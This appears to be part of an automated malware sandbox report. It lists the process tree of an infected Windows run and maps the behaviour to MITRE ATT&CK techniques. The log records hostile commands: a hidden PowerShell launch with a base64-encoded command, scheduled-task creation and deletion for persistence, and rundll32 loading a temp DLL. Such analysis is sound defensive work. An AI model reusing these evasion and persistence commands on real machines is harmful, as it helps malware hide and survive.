C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gZZOCcdMn"
3⤵
PID:4168

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gZZOCcdMn"
3⤵
PID:4940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 460
1⤵
- Program crash
PID:400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 624
1⤵
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2500 -ip 2500
1⤵
PID:1988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4428 -ip 4428
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 364 -ip 364
1⤵
PID:5076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1200 -ip 1200
1⤵
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4428 -ip 4428
1⤵
PID:3436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2500 -ip 2500
1⤵
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 364 -ip 364
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4428 -ip 4428
1⤵
PID:3744

C:\Users\Admin\AppData\Roaming\jrrgtis
C:\Users\Admin\AppData\Roaming\jrrgtis
1⤵
PID:5292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4428 -ip 4428
1⤵
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3356 -ip 3356
1⤵
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5344 -ip 5344
1⤵
PID:5624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4428 -ip 4428
1⤵
PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3356 -ip 3356
1⤵
PID:3580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5344 -ip 5344
1⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4428 -ip 4428
1⤵
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5344 -ip 5344
1⤵
PID:2116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4428 -ip 4428
1⤵
PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5344 -ip 5344
1⤵
PID:6064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:3496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4428 -ip 4428
1⤵
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 5984 -ip 5984
1⤵
PID:5928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5344 -ip 5344
1⤵
PID:3068

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:3500

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery